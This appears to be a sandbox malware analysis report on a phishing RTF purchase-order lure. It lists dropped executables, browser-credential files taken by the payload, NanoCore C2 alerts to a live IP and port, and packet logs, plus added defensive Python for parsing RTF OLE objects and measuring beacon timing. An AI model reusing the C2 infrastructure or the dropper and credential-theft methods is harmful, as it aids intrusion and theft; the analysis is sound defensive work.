                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Users\user\AppData\Roaming\putty.exe
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Roaming\zbEIIaj.tmp
                                Process:C:\ProgramData\images.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.7798653713156546
                                Encrypted:false
                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                Malicious:false
                                Reputation:unknown
                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\zzoj.CG.tmp
                                Process:C:\ProgramData\images.exe
                                File Type:ASCII text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):35549
                                Entropy (8bit):6.06431092799383
                                Encrypted:false
                                SSDEEP:768:2F3tAP0WdZWTHzO+EMvDBdIu++qtXQQJokdugILQ67IU4I9zrLWJ:k3O8Ni+RvDD5/qNQmduDKRIFrLWJ
                                MD5:4E06FDEE66DA477D15AAAFD104802FF3
                                SHA1:2814763828D036134EEF93F28D6C499913E903AA
                                SHA-256:835ADDCE810330CA6D1FE5AA598CB758B639173086517BEBC6B0AAC7CBFDAA1D
                                SHA-512:42521F28CAD2FEA206592962A999202FA65E4A398EF29B9A759DAFFAD60CA95E027ABB52E523C799E7C131A15B17CDFC46FEC102C48EF7569D381C6E47680F37
                                Malicious:false
                                Reputation:unknown
                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"84.0.4147.89"},"easy_unlock":{"device_id":"f691bb0f-1b4f-4339-aef5-321b65f13447"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.595529173769173e+12,"network":1.595503998e+12,"ticks":494811744.0,"uncertainty":4224807.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADCJQEpL4peQLs/tCx05ts1AAAAAAIAAAAAABBmAAAAAQAAIAAAAHMdBSm688AB9E4ujGBlc8b12w9pH8Ho0MG5KX0s9TvsAAAAAA6AAAAAAgAAIAAAAKp70FMSZVCDUsFN1iNo5k0cdS+uI3XobvqN11pz11FbMAAAAHEgEYBv3dbmfqLRp8KY9FTYBCEdPLIJnBuQSIy6PW6ieb+TQlX0tlf+joBO06Pyo0AAAADT82DjaNvFLY7T0RywXTGepumesXXBFeM5MLg7ZlErGegSazITBqJVemjLdeT3R2c6H7dl+tlEXxt1m8SJWLUl"},"policy":{"last_statistics_update":"13240002771769952"},"profile":{"info_cache":{"Default":{"active_time":1595529172.199256,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_26","background_apps":false,"
                                C:\Users\user\Desktop\~$W PO1100372954 -.doc
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4311600611816426
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                Malicious:false
                                Reputation:unknown
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                C:\Windows\System32\rfxvmt.dll
                                Process:C:\ProgramData\images.exe
                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):37376
                                Entropy (8bit):5.7181012847214445
                                Encrypted:false
                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:Rich Text Format data, unknown version
                                Entropy (8bit):3.1682008800082904
                                TrID:
                                • Rich Text Format (5005/1) 55.56%
                                • Rich Text Format (4004/1) 44.44%
                                File name:NEW PO1100372954 -.doc
                                File size:234750
                                MD5:afe48e30fc3f12c2b6ad7d19ae1fff8e
                                SHA1:2ded99867d8b3e9499b10743ae732efec19ccc8e
                                SHA256:ecef57afce8a7d5eed2080401da0ce36d67c2493cf1385b432a6bf0a65f6e521
                                SHA512:9a2bcef0c2f34c68fab71898cdebf2deb8c937fb87b5195fc99e5f4e6bbc156d6549a6fb0535ba4602b95ff1e7bff4404b30ce695c7498be6e21d48a71f2bb58
                                SSDEEP:1536:itW7qA4b64DJ/b6lP1JsvggNNzoBxqM8RLlypLBCy/ndzFz76mAg5eeVhMDw5wfv:itW7qA4b64ggaeG/ndzFtr5RDAw5wfv
                                File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                File Icon

                                Icon Hash:e4eea2aaa4b4b4a4

                                Static RTF Info

                                Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 00000961h | 2 | embedded | package | 20578 | abdtfhgXgdghgh.ScT | C:\jsdsTggf\abdtfhgXGdghgh.ScT | C:\CbkepaDw\abdtfhghgdghgh.ScT | no
1 | 0000B188h | 2 | embedded | OLE2LInk | 2560 | | | | no
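The Objects table above is what you get by walking the OLE 1.0 header of each \objdata blob in the RTF: FormatID 2 means an embedded object, the class name tells you whether it is a Packager object (which writes its payload to disk when activated) or an OLE2Link, and for Packager objects the label, original path and temp path sit in the native data. The script below is an added example written for this page, not Joe Sandbox code and not taken from the sample; it parses a constructed RTF carrying one Package object. The OLE 1.0 field order follows MS-OLEDS; the Packager native-data layout (header word, label, original path, type dword, temp-path length, temp path, payload size, payload) is the commonly documented one and is treated here as an assumption, as are the file names in the constructed input. The hex-only \objdata regex will not survive the control-word obfuscation real maldocs use.

```python
import re
import struct
from binascii import hexlify

# Naive: assumes the hex is not broken up by RTF control words (real maldocs often do that).
OBJDATA_RE = re.compile(rb'\\objdata\s*([0-9A-Fa-f\s]+)')


def _lp_ansi(buf, off):
    """OLE 1.0 LengthPrefixedAnsiString: DWORD length (counts the NUL), then the bytes."""
    (n,) = struct.unpack_from('<I', buf, off)
    off += 4
    return buf[off:off + n].rstrip(b'\x00').decode('latin-1'), off + n


def _cstr(buf, off):
    """NUL-terminated ANSI string starting at off; returns (string, offset past the NUL)."""
    end = buf.index(b'\x00', off)
    return buf[off:end].decode('latin-1'), end + 1


def parse_package(data):
    """Packager native data (assumed layout): WORD header, label NUL, original path NUL,
    DWORD type, DWORD temp-path length incl. NUL, temp path, DWORD payload size, payload."""
    off = 2
    label, off = _cstr(data, off)
    src_path, off = _cstr(data, off)
    _type, tlen = struct.unpack_from('<II', data, off)
    off += 8
    temp_path = data[off:off + tlen].rstrip(b'\x00').decode('latin-1')
    off += tlen
    (plen,) = struct.unpack_from('<I', data, off)
    off += 4
    return {'filename': label, 'source_path': src_path,
            'temp_path': temp_path, 'payload': data[off:off + plen]}


def parse_ole1(blob):
    """OLE 1.0 object as carried in \\objdata: OLEVersion, FormatID (1 linked, 2 embedded),
    ClassName, TopicName, ItemName, NativeDataSize, NativeData (MS-OLEDS)."""
    _version, format_id = struct.unpack_from('<II', blob, 0)
    class_name, off = _lp_ansi(blob, 8)
    _topic, off = _lp_ansi(blob, off)
    _item, off = _lp_ansi(blob, off)
    (size,) = struct.unpack_from('<I', blob, off)
    off += 4
    obj = {'format_id': format_id,
           'format': {1: 'linked', 2: 'embedded'}.get(format_id, 'unknown'),
           'class_name': class_name, 'data_size': size}
    if class_name.lower() == 'package':
        obj.update(parse_package(blob[off:off + size]))
    return obj


def scan_rtf(rtf):
    """One record per \\objdata hex blob found in the RTF bytes."""
    objects = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb'\s+', b'', m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]  # drop a dangling nibble rather than fail
        objects.append(parse_ole1(bytes.fromhex(hexdata.decode('ascii'))))
    return objects


def triage(obj):
    """Heuristic note for an analyst, not a verdict."""
    cls = obj['class_name'].lower()
    if cls == 'package' and obj.get('payload'):
        return 'Package object drops %s via %s' % (obj['filename'], obj['temp_path'] or '<no temp path>')
    if 'ole2link' in cls:
        return 'OLE2Link object (%d bytes of native data)' % obj['data_size']
    return None


# ---- constructed test input (hypothetical names, not from the sample) ----
def _lp(s):
    if not s:
        return struct.pack('<I', 0)
    b = s.encode('latin-1') + b'\x00'
    return struct.pack('<I', len(b)) + b


def build_package_object(label, src_path, temp_path, payload):
    """Build an OLE 1.0 embedded 'Package' object with the layout parse_package expects."""
    tp = temp_path.encode('latin-1') + b'\x00'
    pkg = (struct.pack('<H', 2) + label.encode('latin-1') + b'\x00'
           + src_path.encode('latin-1') + b'\x00'
           + struct.pack('<II', 3, len(tp)) + tp
           + struct.pack('<I', len(payload)) + payload)
    return (struct.pack('<II', 0x00000501, 2) + _lp('Package') + _lp('') + _lp('')
            + struct.pack('<I', len(pkg)) + pkg)


SAMPLE_PAYLOAD = b'MZ' + b'\x00' * 30  # constructed stub, not a real PE
SAMPLE_RTF = (b'{\\rtf1 constructed sample{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata '
              + hexlify(build_package_object('invoice.sct', 'C:\\build\\invoice.sct',
                                             'C:\\Temp\\invoice.sct', SAMPLE_PAYLOAD))
              + b'}}}')

if __name__ == '__main__':
    for o in scan_rtf(SAMPLE_RTF):
        print(o['format'], o['class_name'], o['data_size'], triage(o))
```

Run it against a real RTF by replacing SAMPLE_RTF with the file's bytes; for anything beyond a quick look use rtfobj from oletools, which handles the obfuscated hex and nested objects this regex does not.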

                                Network Behavior

                                Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/02/21-11:00:55.449858 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49170 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:04.085356 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49171 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:10.279735 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49172 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:11.005994 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49172 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:15.859665 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49173 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:26.222099 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49174 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:26.832941 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49174 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:31.194297 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49175 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:36.418179 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49176 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:41.681580 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49177 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:52.872032 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49178 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:58.316930 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49179 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:01:58.959256 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49179 | 8234 | 192.168.2.22 | 203.159.80.186
08/02/21-11:02:03.607658 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
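Several of the alerts above fire twice on the same connection (source ports 49172, 49174 and 49179), and each new source port is a fresh TCP session to 203.159.80.186:8234, so the raw alert count overstates the cadence. The script below is an added example, not part of the report: it collapses the hits to one per connection and measures the gap between successive connections, which is the usual first check for RAT beaconing in IDS output. The timestamps and ports are copied from the table; the jitter threshold and minimum connection count are assumptions to tune per environment.

```python
from datetime import datetime
from statistics import median, pstdev

# The 14 "ET TROJAN Possible NanoCore C2 60B" hits from the report's Snort table:
# (timestamp, source port, destination IP, destination port).
ALERTS = [
    ("08/02/21-11:00:55.449858", 49170, "203.159.80.186", 8234),
    ("08/02/21-11:01:04.085356", 49171, "203.159.80.186", 8234),
    ("08/02/21-11:01:10.279735", 49172, "203.159.80.186", 8234),
    ("08/02/21-11:01:11.005994", 49172, "203.159.80.186", 8234),
    ("08/02/21-11:01:15.859665", 49173, "203.159.80.186", 8234),
    ("08/02/21-11:01:26.222099", 49174, "203.159.80.186", 8234),
    ("08/02/21-11:01:26.832941", 49174, "203.159.80.186", 8234),
    ("08/02/21-11:01:31.194297", 49175, "203.159.80.186", 8234),
    ("08/02/21-11:01:36.418179", 49176, "203.159.80.186", 8234),
    ("08/02/21-11:01:41.681580", 49177, "203.159.80.186", 8234),
    ("08/02/21-11:01:52.872032", 49178, "203.159.80.186", 8234),
    ("08/02/21-11:01:58.316930", 49179, "203.159.80.186", 8234),
    ("08/02/21-11:01:58.959256", 49179, "203.159.80.186", 8234),
    ("08/02/21-11:02:03.607658", 49180, "203.159.80.186", 8234),
]


def parse_ts(ts):
    """Snort fast-alert timestamp, e.g. 08/02/21-11:00:55.449858 (no year century, no tz)."""
    return datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f")


def first_hit_per_flow(alerts):
    """Collapse repeated alerts on one connection (same 3-tuple) to that flow's earliest hit."""
    flows = {}
    for ts, sport, dip, dport in alerts:
        key = (sport, dip, dport)
        t = parse_ts(ts)
        if key not in flows or t < flows[key]:
            flows[key] = t
    return sorted(flows.values())


def beacon_stats(alerts):
    """Inter-connection gaps in seconds plus median and population std-dev."""
    starts = first_hit_per_flow(alerts)
    gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    return {
        "connections": len(starts),
        "gaps": gaps,
        "median_gap_s": median(gaps) if gaps else 0.0,
        "stdev_s": pstdev(gaps) if len(gaps) > 1 else 0.0,
    }


def looks_like_beacon(alerts, max_jitter_ratio=1.0, min_connections=5):
    """Assumed thresholds: enough reconnects, and jitter no larger than the typical gap."""
    s = beacon_stats(alerts)
    if s["connections"] < min_connections:
        return False
    return s["stdev_s"] <= max_jitter_ratio * s["median_gap_s"]


if __name__ == "__main__":
    s = beacon_stats(ALERTS)
    print("%d connections, median gap %.2fs, stdev %.2fs, beacon=%s"
          % (s["connections"], s["median_gap_s"], s["stdev_s"], looks_like_beacon(ALERTS)))
```

On the report's data this yields 11 distinct connections at a median gap of about 5.5 seconds with a few longer gaps around 8 to 11 seconds, which is consistent with a client reconnecting on a short fixed timer rather than with user-driven traffic. Feed it the alert log for a host over a longer window before drawing conclusions; two minutes of sandbox time is a small sample.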

                                Network Port Distribution

                                TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 2, 2021 10:59:54.181540012 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.219240904 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.219322920 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.220050097 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.251251936 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.251281023 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.251302004 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.251323938 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.251357079 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.251631021 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.282464981 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.282495975 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.282511950 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.282535076 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.282556057 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.282576084 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.282597065 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.282608986 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.282615900 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.282643080 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.282646894 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.282649994 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311568975 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311600924 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311621904 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311642885 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311640978 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311666965 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311675072 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311680079 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311682940 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311690092 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311697006 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311709881 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311727047 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311731100 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311738014 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311753035 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311774015 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311764956 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311790943 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311794996 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311800003 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311817884 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311834097 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311841011 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311841965 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311863899 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311875105 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311886072 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311901093 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311906099 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.311908960 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.311945915 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.313561916 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341093063 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341123104 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341144085 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341165066 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341166973 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341186047 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341198921 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341202974 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341207027 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341212988 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341232061 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341247082 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341253042 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341264963 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341274977 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341289997 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341295004 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341310024 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341315985 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341325998 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341337919 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341353893 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341358900 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341358900 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341381073 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341389894 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341403961 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341408014 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341425896 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341435909 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341447115 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341456890 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341468096 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341471910 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341489077 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341497898 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341511011 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341520071 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341531992 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341538906 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341552973 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341561079 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341577053 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22
Aug 2, 2021 10:59:54.341583967 CEST | 49165 | 80 | 192.168.2.22 | 203.159.80.186
Aug 2, 2021 10:59:54.341598988 CEST | 80 | 49165 | 203.159.80.186 | 192.168.2.22

                                UDP Packets

